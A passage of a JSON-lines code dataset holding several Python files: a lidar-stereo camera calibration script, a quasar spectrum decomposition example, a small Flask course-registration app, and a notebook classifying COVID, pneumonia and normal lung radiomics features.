line=dict(color='rgb(0, 0, 0)', width=0.5), color=c, opacity=1),\n name=label,\n visible=v\n )\n return surface_points\n\n\ndef showPointCloud(object, name, show_normal):\n \"\"\"\n Plots point cloud\n :param object: open3d point cloud\n :param name: string, name ob plot\n :param show_normal: boolean, displays normals\n \"\"\"\n if name == '':\n name = \"Objekt\"\n if show_normal == '':\n show_normal = False\n o3d.visualization.draw_geometries([object], \"name\", height=800, width=800,\n point_show_normal=show_normal, mesh_show_back_face=False)\n\n\ndef showGraph(title, x_colname, y_colname, z_colname, traces):\n \"\"\"\n Shows plotly plot in browser\n :param title: string, headline of plot\n :param x_colname: string, name of x-axle\n :param y_colname: string, name of y-axle\n :param z_colname: string, name of z-axle\n :param traces: plotly format, data to display\n \"\"\"\n layout = go.Layout(\n scene=dict(\n xaxis=dict(title=x_colname, autorange=True),\n yaxis=dict(title=y_colname, autorange=True),\n zaxis=dict(title=z_colname, autorange=True)\n )\n )\n\n camera = dict(\n up=dict(x=0, y=0, z=1),\n center=dict(x=0, y=0, z=0),\n eye=dict(x=-2, y=0, z=0.5)\n )\n\n fig = go.Figure(data=traces, layout=layout)\n fig.update_layout(scene_camera=camera, title=title)\n # plotly.offline.plot(fig, filename='packet_data/test_data/' + title + '.html')\n fig.show()\n\n\ndef drawIntersectionLines(intersections, name, color):\n \"\"\"\n prepares data for plotly, namely plots intersection lines\n :param intersections: numpy array with all intersection points\n :param name: name of point cloud\n :param color: color of plotted lines\n :return: plotly trace lines\n \"\"\"\n line_1 = np.concatenate(([intersections[0]], [intersections[2]], [intersections[4]],\n [intersections[3]], [intersections[0]]), axis=0)\n line_2 = np.concatenate(([intersections[0]], [intersections[1]], [intersections[5]], [intersections[2]]), axis=0)\n line_3 = np.concatenate(([intersections[1]], [intersections[6]], [intersections[3]]), axis=0)\n\n line_1 = getMesh(line_1[:, 0], line_1[:, 1], line_1[:, 2],\n c=color, label=f\"{name}\", v=\"legendonly\")\n line_2 = getMesh(line_2[:, 0], line_2[:, 1], line_2[:, 2],\n c=color, label=f\"{name}\", v=\"legendonly\")\n line_3 = getMesh(line_3[:, 0], line_3[:, 1], line_3[:, 2],\n c=color, label=f\"{name}\", v=\"legendonly\")\n return line_1, line_2, line_3\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--debug\", action=\"store_true\", help=\"Debug on/off\")\n parser.add_argument(\"-dl\", \"--distance_lidar\", help=\"Value for Distance Computing for Lidar\",\n default=0.1, type=float)\n parser.add_argument(\"-ds\", \"--distance_stereo\", help=\"Value for Distance Computing for Stereo\",\n default=0.05, type=float)\n parser.add_argument(\"-rl\", \"--ransac_lidar\", help=\"Value for Ransac Threshold for Lidar\",\n default=0.01, type=float)\n parser.add_argument(\"-rs\", \"--ransac_stereo\", help=\"Value for Ransac Threshold for Stereo\",\n default=0.004, type=float)\n parser.add_argument(\"-xmin\", \"--x_minimum\", help=\"Minimum value for cropping in x-direction\",\n default=5, type=float)\n parser.add_argument(\"-xmax\", \"--x_maximum\", help=\"Maximum value for cropping in x-direction\",\n default=8, type=float)\n parser.add_argument(\"-ymin\", \"--y_minimum\", help=\"Minimum value for cropping in y-direction\",\n default=-1.5, type=float)\n parser.add_argument(\"-ymax\", \"--y_maximum\", help=\"Maximum value for cropping in y-direction\",\n default=2, type=float)\n parser.add_argument(\"-zmin\", \"--z_minimum\", help=\"Minimum value for cropping in z-direction\",\n default=-1, type=float)\n parser.add_argument(\"-zmax\", \"--z_maximum\", help=\"Maximum value for cropping in z-direction\",\n default=1, type=float)\n parser.add_argument(\"-l\", \"--length\", help=\"Length of the packet\", default=0.45, type=float)\n parser.add_argument(\"-w\", \"--width\", help=\"Width of the packet\", default=0.35, type=float)\n parser.add_argument(\"-he\", \"--height\", help=\"Height of the packet\", default=0.4, type=float)\n parser.add_argument(\"-p\", \"--path\", help=\"path to data\", default=\"\", type=str)\n args = parser.parse_args()\n debug = args.debug\n \"\"\"\n Lidar Data, have to be changed\n \"\"\"\n # lidar = [\"data/stuhl.pcd\"]\n\n # object_lidar = [\"data/packet.pcd\"]\n\n # \"\"\"\n # Stereo Data, have to be changed\n # \"\"\"\n # stereo = [\"data/stuhl.txt\"]\n # object_stereo = [\"data/packet.txt\"]\n if args.path == \"\":\n lidar = [\"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/lidar_empty.txt\", \"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/lidar_empty.txt\"]\n object_lidar = [\"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/lidar_ob_1.txt\", \"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/lidar_ob_2.txt\"]\n\n stereo = [\"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/stereo_empty.txt\", \"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/stereo_empty.txt\"]\n object_stereo = [\"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/stereo_ob_1.txt\", \"/home/dennis/git_repos/multisenselakeperceptor/tools/velodyne_stereo_calib/stereo_ob_2.txt\"]\n else:\n lidar_path = os.path.join(args.path, \"lidar\")\n lidar_elements = sorted(os.listdir(lidar_path))\n object_lidar = []\n for i in range(1, len(lidar_elements)):\n object_lidar.append(os.path.join(lidar_path, lidar_elements[i]))\n lidar = []\n for i in range(len(lidar_elements)-1):\n lidar.append(os.path.join(lidar_path, lidar_elements[0]))\n\n stereo_path = os.path.join(args.path, \"stereo\")\n stereo_elements = sorted(os.listdir(stereo_path))\n object_stereo = []\n for i in range(1, len(stereo_elements)):\n object_stereo.append(os.path.join(stereo_path, stereo_elements[i]))\n stereo = []\n for i in range(len(stereo_elements)-1):\n stereo.append(os.path.join(stereo_path, stereo_elements[0]))\n\n\n s_all_l = s_all_s = inliers_l = inliers_s = np.empty((0, 3))\n for i in range(len(lidar)):\n \"\"\"\n Read Data\n \"\"\"\n print(\"Read data from\", lidar[i])\n file_lidar = o3d.io.read_point_cloud(lidar[i], format='xyz')\n print(\"Read data from\", object_lidar[i])\n file_object_lidar = o3d.io.read_point_cloud(object_lidar[i], format='xyz')\n print(\"Read data from\", stereo[i])\n file_stereo = o3d.io.read_point_cloud(stereo[i], format='xyzrgb')\n print(\"Read data from\", object_stereo[i])\n file_object_stereo = o3d.io.read_point_cloud(object_stereo[i], format='xyzrgb')\n\n \"\"\" Cropping of data if necessary \"\"\"\n crop = [args.x_minimum, args.x_maximum, args.y_minimum, args.y_maximum, args.z_minimum, args.z_maximum]\n\n \"\"\"\n remove_points can be changed to remove_points_extended for cropping of x, y and z axles\n \"\"\"\n file_lidar = remove_points_extended(file_lidar, crop)\n file_object_lidar = remove_points_extended(file_object_lidar, crop)\n\n \"\"\"\n Transform Stereodata to Lidar coordinate system\n \"\"\"\n file_stereo_t = transform_stereo(file_stereo)\n file_object_stereo_t = transform_stereo(file_object_stereo)\n\n file_stereo_c = remove_points_extended(file_stereo_t, crop)\n file_object_stereo_c = remove_points_extended(file_object_stereo_t, crop)\n\n \"\"\" Run main on Lidar and Stereo \"\"\"\n s_all_l_, inliers_l_ = main(file_lidar, file_object_lidar, args.distance_lidar,\n \"Lidar\", args.ransac_lidar, args.length, args.width, args.height)\n s_all_l = np.append(s_all_l, s_all_l_, axis=0)\n inliers_l = np.append(inliers_l, inliers_l_, axis=0)\n print(\"Lidar finished\")\n s_all_s_, inliers_s_ = main(file_stereo_c, file_object_stereo_c, args.distance_stereo,\n \"Stereo\", args.ransac_stereo, args.length, args.width, args.height)\n s_all_s = np.append(s_all_s, s_all_s_, axis=0)\n inliers_s = np.append(inliers_s, inliers_s_, axis=0)\n print(\"Stereo finished\")\n\n \"\"\"\n Show point clouds before icp\n \"\"\"\n if debug:\n inliers1_l = getTrace(inliers_l[:, 0], inliers_l[:, 1], inliers_l[:, 2], s=4, label=\"Lidar\", c=\"green\")\n inliers1_s = getTrace(inliers_s[:, 0], inliers_s[:, 1], inliers_s[:, 2], s=4, label=\"Stereo\", c=\"orange\")\n\n schnittpunkt1l = getTrace(s_all_l[:, 0], s_all_l[:, 1], s_all_l[:, 2], s=6, c='blue',\n label=f'S: Lidar')\n\n schnittpunkt1s = getTrace(s_all_s[:, 0], s_all_s[:, 1], s_all_s[:, 2], s=6, c='red',\n label=f'S: Stereo')\n showGraph(\n \"Point Clouds\",\n \"Z\", \"X\", \"Y\",\n [schnittpunkt1l, inliers1_l,\n schnittpunkt1s, inliers1_s])\n\n \"\"\" Compute center of mass and singular value decomposition \"\"\"\n rotation, translation = icp(s_all_l, s_all_s)\n \"\"\" Allign Stereo data to lidar data \"\"\"\n inliers_s = point_alignments(rotation, translation, inliers_s)\n s_all_s = point_alignments(rotation, translation, s_all_s)\n\n \"\"\" Get euclidean distance between intersections \"\"\"\n geteuclideandistance(s_all_s, s_all_l)\n\n \"\"\"\n Show point clouds after icp\n \"\"\"\n if debug:\n l1, l2, l3 = drawIntersectionLines(s_all_l, \"Lidar\", \"lightsteelblue\")\n s1, s2, s3 = drawIntersectionLines(s_all_s, \"Stereo\", \"salmon\")\n \"\"\" Build trace for plotly \"\"\"\n inliers_l = getTrace(inliers_l[:, 0], inliers_l[:, 1], inliers_l[:, 2], s=4, label=\"Lidar\", c=\"green\")\n inliers_s = getTrace(inliers_s[:, 0], inliers_s[:, 1], inliers_s[:, 2], s=4, label=\"Stereo\", c=\"orange\")\n\n schnittpunkt1l = getTrace(s_all_l[:, 0], s_all_l[:, 1], s_all_l[:, 2], s=6, c='blue',\n label=f'S: Lidar')\n\n schnittpunkt1s = getTrace(s_all_s[:, 0], s_all_s[:, 1], s_all_s[:, 2], s=6, c='red',\n label=f'S: Stereo')\n\n showGraph(\n \"Point Clouds aligned\",\n \"Z\", \"X\", \"Y\",\n [schnittpunkt1l, inliers_l,\n schnittpunkt1s, inliers_s,\n l1, l2, l3,\n s1, s2, s3])\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"madeberl/lidar_stereocamera_calibration","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29413232422","text":"# Example\nimport hostDecomp\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\nfile = 'data/decomp_test.csv'\ntest = hostDecomp.HostDecomp(file, 0.1)\n\nparams = test.run()\n\npdata = pd.read_csv(file)\nlams, flux, eflux = pdata['Wavelength'], pdata['Flux'], pdata['eFlux']\nfig, ax = plt.subplots()\nax.plot(lams, flux, label='Data')\n\nfile = 'data/hostDecomp/decomp_test.csv'\npdata = pd.read_csv(file)\nlams, flux, eflux = pdata['Wavelength'], pdata['Flux'], pdata['eFlux']\nax.plot(lams, flux, label='QSO')\n\nax.plot(lams, test.evalQSOGen(params, np.array(lams)).flux, label='Model')\nax.plot(lams, test.evalQSOGen(params, np.array(lams)).host_galaxy_flux, label='Host')\nax.set_xlabel('Wavelength ($\\\\AA$)')\nax.set_ylabel('Flux Density per Angstrom')\nax.legend()\nplt.show()","repo_name":"samlaihei/PyQSpecFit","sub_path":"hostDecomp_test.py","file_name":"hostDecomp_test.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"36694475916","text":"import os\nimport sqlite3\nimport time\nfrom flask import Flask, request, session, g, redirect, url_for, abort, \\\n render_template, flash\n##import database \n\napp = Flask(__name__)\n\n# Load default config and override config from an environment variable\napp.config.update(dict(\n DATABASE=os.path.join(app.root_path, 'flaskr.db'),\n SECRET_KEY='development key',\n))\n\napp.config.from_envvar('FLASKR_SETTINGS', silent=True) \n\n\ndef connect_db():\n \"\"\"Connects to the specific database.\"\"\"\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv\n\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\n@app.teardown_appcontext\ndef close_db(error):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\ndef init_db():\n db = get_db()\n with app.open_resource('tables.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Initializes the database.\"\"\"\n init_db()\n print('Initialized the database.')\n\n\n\n\n@app.route('/')\ndef index():\n db = get_db()\n cur = db.execute('SELECT * FROM COURSE')\n courses = cur.fetchall()\n return render_template(\"index.html\", courses=courses) \n\n\n@app.route('/totallyreallogin', methods=['POST'])\ndef reallogin():\n return redirect(url_for('home')) \n\n \n@app.route('/homepage')\ndef home():\n db = get_db()\n cur = db.execute('SELECT * FROM COURSE')\n courses = cur.fetchall()\n return render_template(\"homepage.html\", courses=courses)\n \n\n\n\n@app.route('/Registration.html')\ndef registration():\n db = get_db()\n cur = db.execute('SELECT * FROM COURSE')\n courses = cur.fetchall()\n return render_template(\"Registration.html\", courses=courses)\n\n\n@app.route('/Schedule1')\ndef schedule():\n db = get_db()\n cur = db.execute('SELECT REGISTRATION.SEM_ID, REGISTRATION.STU_ID, COURSE.CRS_ID, COURSE.CRS_NAME FROM REGISTRATION INNER JOIN COURSE ON COURSE.CRS_ID = REGISTRATION.CRS_ID WHERE REGISTRATION.SEM_ID = \"FA2020\" AND REGISTRATION.STU_ID = 02837732;') \n courses = cur.fetchall()\n return render_template(\"Registration.html\", courses=courses)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run()\n \n","repo_name":"macayajones32/SAD_FinalProject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24931654761","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport os\nimport torch\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom PIL import Image \nfrom sklearn import metrics\nimport scipy.stats as stats\nfrom sklearn.svm import SVC\nimport matplotlib.pyplot as plt\nfrom scipy.stats import ks_2samp\nfrom sklearn.cluster import KMeans\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.decomposition import PCA\nfrom skimage.io import imread, imshow\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import accuracy_score, plot_roc_curve\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import label_binarize\nfrom itertools import combinations, permutations\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import cross_val_score\n# from sklearn.model_selection import RepeatedStratifiedKFold\nfrom sklearn.metrics import f1_score, roc_auc_score, roc_curve, auc\n\n\n# In[2]:\n\n\ncovid_path = '/Users/deangao/Desktop/CSM226/covidProject_data/covid/augmented/images/'\nnorm_path = '/Users/deangao/Desktop/CSM226/covidProject_data/normal/'\npneu_path = '/Users/deangao/Desktop/CSM226/covidProject_data/pneumonia/'\n\n\n# In[3]:\n\n\n# covid_imgs = []\n# for p in os.listdir(covid_path):\n# # img = Image.open(covid_path + 'images/' + p)\n# covid_imgs.append(p)\n# # print(p)\n\n# c_pixels = []\n# for c_img in covid_imgs:\n# print(c_img)\n# data = imread(c_img, as_gray=True)\n# c_pixels.append(data)\n\n\n# In[4]:\n\n\nimg_train = pd.read_csv('/Users/deangao/Desktop/CSM226/covidProject_data/radiomics/train_covid_normal_pn.csv')\nimg_test = pd.read_csv('/Users/deangao/Desktop/CSM226/covidProject_data/radiomics/test_covid_normal_pn.csv')\nall_data = pd.concat([img_train, img_test], axis=0)\n\nimg_train = img_train.drop(columns=['id', 'Entropy', 'Uniformity', 'Energy'])\nimg_test = img_test.drop(columns=['id', 'Entropy', 'Uniformity', 'Energy'])\nall_data = all_data.drop(columns=['id', 'Entropy', 'Uniformity', 'Energy'])\n\n\n# In[5]:\n\n\ntrain_X, train_y = img_train.iloc[:, :-1], img_train.iloc[:, -1]\ntest_X, test_y = img_test.iloc[:, :-1], img_test.iloc[:, -1]\nlabels = {0: 'normal lung', 1: 'pneumonia lung', 2: 'covid lung'}\n\nscaler = MinMaxScaler()\nscaled_data = scaler.fit_transform(train_X)\n\nscaler2 = MinMaxScaler()\nscaled_all = scaler2.fit_transform(all_data.iloc[:, :-1])\nscaled_all_data = pd.concat([pd.DataFrame(all_data.iloc[:, -1].reset_index()), pd.DataFrame(scaled_all, columns=train_X.columns)], axis=1)\nscaled_all_data = scaled_all_data.drop(['index'], axis=1)\n\n\n# In[6]:\n\n\nall_data.shape\nall_data.iloc[:, -1]\npd.DataFrame(scaled_all)\n# pd.DataFrame(all_data.iloc[:, -1])\n# pd.concat([pd.DataFrame(all_data.iloc[:, -1]), pd.DataFrame(scaled_all)], axis=1)\nscaled_all_data\n\n\n# In[7]:\n\n\ndef flag_different_distributions(img_train):\n combos = combinations([0, 1, 2], 2)\n for i in range(img_train.shape[1]-1):\n feature = img_train.iloc[:, [i, -1]]\n for c in combos:\n stat, p = ks_2samp(feature[feature.label==c[0]].iloc[:, i], feature[feature.label==c[1]].iloc[:, i])\n if p < 0.05:\n print(f'There is a significantly different distribution between {labels[c[0]]} and {labels[c[1]]}, on the feature {img_train.iloc[:, i].name}')\n\n\n# In[8]:\n\n\ndef plot_distributions(img_train):\n '''\n Distributions for each of the features, grouped by normal, pneumonia, and covid\n '''\n for i in range(img_train.shape[1]-1):\n for j in range(3):\n x = img_train[img_train.label==j]\n sns.displot(data = x, x = img_train.iloc[:, i].name)\n plt.title(f'{labels[j]}')\n\n\n# In[9]:\n\n\ndef calc_ANOVA(df):\n '''\n Uses pairwise tests to test against the null hypothesis that there is NO significant difference between means of groups\n '''\n for i in range(df.shape[1]-1):\n stat, p = stats.f_oneway(df.iloc[:, i][df.iloc[:, -1] == 0], df.iloc[:, i][df.iloc[:, -1] == 1], df.iloc[:, i][df.iloc[:, -1] == 2])\n if p < 0.05/3:\n print(f'There is a statistically significant difference in means between classes on feature {df.iloc[:, i].name}, with p-value = {np.format_float_scientific(p)}')\n else:\n print(f'There is no statistically significant difference in means between classes on feature {df.iloc[:, i].name}, with p-value = {np.format_float_scientific(p)}')\n\n\n# In[10]:\n\n\ndef calc_PCA(X, n, test_X):\n scaler = MinMaxScaler()\n scaled_train = scaler.fit_transform(X)\n scaled_test = scaler.fit_transform(test_X)\n# idx = X.shape[1]\n pca = PCA(n_components = n)\n pca_scores = pca.fit_transform(scaled_train)\n test_pca = pca.transform(scaled_test)\n pca_df = pd.DataFrame(data = pca_scores, columns = [f'PC{i+1}' for i in range(n)])\n return pca, pca_df, test_pca\n\n\n# In[11]:\n\n\ndef plot_2d_PCA(pc_df, labels, hue):\n df = pd.concat([pc_df, labels], axis=1)\n# sns.set_palette(sns.color_palette('Paired'))\n sns.scatterplot(data = df, x = df.PC1, y = df.PC2, hue = hue)\n\n\n# In[12]:\n\n\ndef compute_error(model, X, y, X_test, y_test):\n kf = KFold(n_splits=5)\n kf.get_n_splits(X)\n X = np.array(X)\n y = np.array(y)\n train_errors = 0\n valid_errors = 0\n for train_index, valid_index in kf.split(X):\n X_train, X_valid = X[train_index], X[valid_index]\n y_train, y_valid = y[train_index], y[valid_index]\n mod = model.fit(X_train, y_train)\n train_preds = mod.predict(X_train)\n valid_preds = mod.predict(X_valid)\n train_error = 1 - metrics.accuracy_score(y_train, train_preds, normalize=True)\n train_errors += train_error\n valid_preds = mod.predict(X_valid)\n valid_error = 1 - metrics.accuracy_score(y_valid, valid_preds, normalize=True)\n train_errors += train_error\n valid_errors += valid_error\n y_test_preds = mod.predict(X_test)\n f1 = f1_score(y_test, y_test_preds, average='weighted')\n test_error = 1 - metrics.accuracy_score(y_test, y_test_preds, normalize=True)\n avg_train_error = train_errors/5\n avg_valid_error = valid_errors/5\n return avg_train_error, avg_valid_error, test_error, f1, y_test_preds\n\n\n# In[13]:\n\n\n# plot_distributions(img_train)\ncalc_ANOVA(img_train)\ny = []\nx = [n for n in range(1, train_X.shape[1])]\nfor n in range(1, train_X.shape[1]):\n pca, pca_df1, test_X_PCA = calc_PCA(train_X, n, test_X)\n y.append(np.cumsum(pca.explained_variance_ratio_)[-1])\n print(np.cumsum(pca.explained_variance_ratio_))\n \n# Plots the first two PCA components \npc2, pc_df, test_X_PCA2 = calc_PCA(train_X, 2, test_X)\ny_labeled = train_y.replace({0: 'normal', 1: 'pneumonia', 2: 'covid'})\nplot_2d_PCA(pc_df, pd.DataFrame(y_labeled), 'label')\n\n# Appends the four selected PCA components to the original X dataframe\n# pc4, pc_df4 = calc_PCA(scaled_data, 4)\n# train_X = pd.concat([train_X, pc_df4], axis=1)\ntrain_X\n\n\n# In[14]:\n\n\n# Plots num of PCA components against variance explained\nplt.plot(x, y)\nplt.xlabel('PCA Components')\nplt.ylabel('Variance Explained')\nplt.show()\n\n\n# In[15]:\n\n\n'''\nCovariance and Correlation\n'''\ncov_matrix = np.cov(train_X.T)\ncorrelation_matrix = train_X.corr()\n\nfor i in range(correlation_matrix.values.shape[0]):\n for j in range(correlation_matrix.values.shape[1]):\n if i != j:\n if correlation_matrix.values[i, j] > 0.9:\n print(f'There is a significant correlation ({correlation_matrix.values[i, j]}) between {train_X.columns[j]} and {train_X.columns[i]}')\n \n\n\n# In[16]:\n\n\nscaled_all_data.shape\n\n\n# In[17]:\n\n\n'''\nKMeans\n'''\n# Fits a KMeans model with three cluster groups and appends the predicted labels to the original labels frame (for comparison)\nfeatures_to_use = ['Kurtosis', 'MeanAbsoluteDeviation', 'Mean', 'Range', 'RootMeanSquared', 'Skewness', 'TotalEnergy', 'Variance']\nX_to_fit = [idx for idx in range(len(scaled_all_data.columns)) if scaled_all_data.columns[idx] in features_to_use] \n# for i in range(len(X_to_fit)):\n# X_to_fit[i] += 1\nX_to_fit = [4, 6, 7, 10, 12, 13, 14, 15]\nkmeans = KMeans(n_clusters=3).fit(scaled_all_data.iloc[:, X_to_fit])\ndf_kmeans = pd.concat([pd.DataFrame(kmeans.labels_, columns=['KMeans']), pd.DataFrame(scaled_all_data)], axis=1)\nnum_errors = df_kmeans[df_kmeans.label != df_kmeans.KMeans].shape[0]\naccuracy = num_errors/df_kmeans.shape[0]\nprint(f\"KMeans model has {accuracy} accuracy\")\n\n\nplot_2d_PCA(pc_df, pd.DataFrame(df_kmeans.KMeans), 'KMeans')\n\n# AUC ROC\n# kmeans_dummy = pd.get_dummies(pd.DataFrame(df_kmeans.iloc[:, 0]), columns=[0])\n# kmeans_true = df_kmeans.iloc[:, 1]\nk_labels = df_kmeans[['KMeans', 'label']]\nk_accuracy = metrics.accuracy_score(k_labels.label, k_labels.KMeans, normalize=True)\nf1_k = f1_score(k_labels.label, k_labels.KMeans, average='weighted')\nprint(f'The F1 for kmeans is {f1_k}')\nprint(f'The accuracy for kmeans is {k_accuracy}')\n\n\n# In[18]:\n\n\nzeros = df_kmeans[df_kmeans.label == 0]\nones = df_kmeans[df_kmeans.label == 1]\ntwos = df_kmeans[df_kmeans.label == 2]\n\nk_tp_norm = zeros[zeros.KMeans==0].shape[0]\nk_fn_norm = df_kmeans[(df_kmeans.label==0) & (df_kmeans.KMeans != 0)].shape[0]\nsens_k_norm = k_tp_norm/(k_tp_norm+k_fn_norm)\n\nk_tn_norm = df_kmeans[(df_kmeans.label != 0) & (df_kmeans.KMeans != 0)].shape[0]\nk_fp_norm = df_kmeans[(df_kmeans.label != 0) & (df_kmeans.KMeans == 0)].shape[0]\nspec_k_norm = k_tn_norm/(k_tn_norm + k_fp_norm)\nprint(f'For NORMAL the sensitivity is {sens_k_norm}, specificity is {spec_k_norm}')\n\n\n# In[19]:\n\n\nk_tp_pneu = ones[ones.KMeans==1].shape[0]\nk_fn_pneu = df_kmeans[(df_kmeans.label==1) & (df_kmeans.KMeans != 1)].shape[0]\nsens_k_pneu = k_tp_pneu/(k_tp_pneu+k_fn_pneu)\n\nk_tn_pneu = df_kmeans[(df_kmeans.label != 1) & (df_kmeans.KMeans != 1)].shape[0]\nk_fp_pneu = df_kmeans[(df_kmeans.label != 1) & (df_kmeans.KMeans == 1)].shape[0]\nspec_k_pneu = k_tn_pneu/(k_tn_pneu + k_fp_pneu)\nspec_k_pneu\nprint(f'For PNEUMONIA the sensitivity is {sens_k_pneu}, specificity is {spec_k_pneu}')\n\n\n# In[20]:\n\n\nk_tp_covid = twos[twos.KMeans==2].shape[0]\nk_fn_covid = df_kmeans[(df_kmeans.label==2) & (df_kmeans.KMeans != 2)].shape[0]\nsens_k_covid = k_tp_covid/(k_tp_covid+k_fn_covid)\nsens_k_covid\n\nk_tn_covid = df_kmeans[(df_kmeans.label != 2) & (df_kmeans.KMeans != 2)].shape[0]\nk_fp_covid = df_kmeans[(df_kmeans.label != 2) & (df_kmeans.KMeans == 2)].shape[0]\nspec_k_covid = k_tn_covid/(k_tn_covid + k_fp_covid)\nprint(f'For COVID the sensitivity is {sens_k_covid}, specificity is {spec_k_covid}')\nspec_k_covid\n\n\n# In[ ]:\n\n\n'''\nSVM\n'''\n# Fit an SVM using all of the features\n# X = train_X\n# y = train_y\n# m1 = SVC(C=1, kernel='linear', decision_function_shape='ovo').fit(X, y)\n# m1_train_preds = m1.predict(X)\n# m1_test_preds = m1.predict(test_X)\n# m1_decision = m1.decision_function(test_X)\n# m1_score = m1.score(test_X, test_y)\n# m1_f1_train = f1_score(train_y, m1_train_preds, average='weighted')\n# m1_f1_test = f1_score(test_y, m1_test_preds, average='weighted') \n\n# _, X2_train, X2_test = calc_PCA(train_X, 5, test_X)\n# X2_train = X2_train\n# m2 = SVC(C=1, kernel='linear', decision_function_shape='ovo').fit(X2_train, y)\n# m2_train_preds = m2.predict(X2_train)\n# m2_test_preds = m2.predict(X2_test)\n# m2_decision = m2.decision_function(X2_test)\n# m2_score = m2.score(X2_test, test_y)\n# m2_f1_train = f1_score(train_y, m2_train_preds, average='weighted')\n# m2_f1_test = f1_score(test_y, m2_test_preds, average='weighted')\n# svm_labels = pd.concat([test_y, pd.DataFrame(m2_test_preds)], axis=1)\n# m2_accuracy = metrics.accuracy_score(svm_labels.label, svm_labels[0], normalize=True)\n# print(f'The F1 for SVM is {m2_f1_test}')\n# print(f'The accuracy for SVM is {m2_accuracy}')\n\n# y_train = label_binarize(train_y, classes=[0, 1, 2])\n# y_test = label_binarize(test_y, classes=[0, 1, 2])\n# n_classes = 3\n\n# # # Learn to predict each class against the other\nsvm_clf = OneVsRestClassifier(SVC(kernel='linear', probability=True))\n\ny_score = svm_clf.fit(train_X, y_train).decision_function(X_test)\n\n# # Compute ROC curve and ROC area for each class\n# fpr = dict()\n# tpr = dict()\n# roc_auc = dict()\n# for i in range(n_classes):\n# fpr[i], tpr[i], _ = roc_curve(y_test[:, i], y_score[:, i])\n# roc_auc[i] = auc(fpr[i], tpr[i])\n\n# # Compute micro-average ROC curve and ROC area\n# fpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\n# roc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n\n# plt.figure()\n# lw = 2\n# plt.plot(fpr[2], tpr[2], color='darkorange',\n# lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\n# plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n# plt.xlim([0.0, 1.0])\n# plt.ylim([0.0, 1.05])\n# plt.xlabel('False Positive Rate')\n# plt.ylabel('True Positive Rate')\n# plt.title('Receiver operating characteristic example')\n# plt.legend(loc=\"lower right\")\n# plt.show()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[22]:\n\n\n# svm_tp_norm = svm_labels[(svm_labels.label==0) & (svm_labels[0]==0)].shape[0]\n# svm_fn_norm = svm_labels[(svm_labels.label==0) & (svm_labels[0] != 0)].shape[0]\n# sens_svm_norm = svm_tp_norm/(svm_tp_norm + svm_fn_norm)\n\n# svm_tn_norm = svm_labels[(svm_labels.label != 0) & (svm_labels[0] != 0)].shape[0]\n# svm_fp_norm = svm_labels[(svm_labels.label != 0) & (svm_labels[0] == 0)].shape[0]\n# spec_svm_norm = svm_tn_norm/(svm_tn_norm + svm_fp_norm)\n\n# print(f'For NORMAL the sensitivity is {sens_svm_norm}, specificity is {spec_svm_norm}')\n\n\n# In[23]:\n\n\n# svm_tp_pneu = svm_labels[(svm_labels.label==1) & (svm_labels[0]==1)].shape[0]\n# svm_fn_pneu = svm_labels[(svm_labels.label==1) & (svm_labels[0] != 1)].shape[0]\n# sens_svm_pneu = svm_tp_pneu/(svm_tp_pneu + svm_fn_pneu)\n\n# svm_tn_pneu = svm_labels[(svm_labels.label != 1) & (svm_labels[0] != 1)].shape[0]\n# svm_fp_pneu = svm_labels[(svm_labels.label != 1) & (svm_labels[0] == 1)].shape[0]\n# spec_svm_pneu = svm_tn_pneu/(svm_tn_pneu + svm_fp_pneu)\n\n# print(f'For PNEUMONIA the sensitivity is {sens_svm_pneu}, specificity is {spec_svm_pneu}')\n\n\n# In[24]:\n\n\n# svm_tp_covid = svm_labels[(svm_labels.label==2) & (svm_labels[0]==2)].shape[0]\n# svm_fn_covid = svm_labels[(svm_labels.label==2) & (svm_labels[0] != 2)].shape[0]\n# sens_svm_covid = svm_tp_covid/(svm_tp_covid + svm_fn_covid)\n\n# svm_tn_covid = svm_labels[(svm_labels.label != 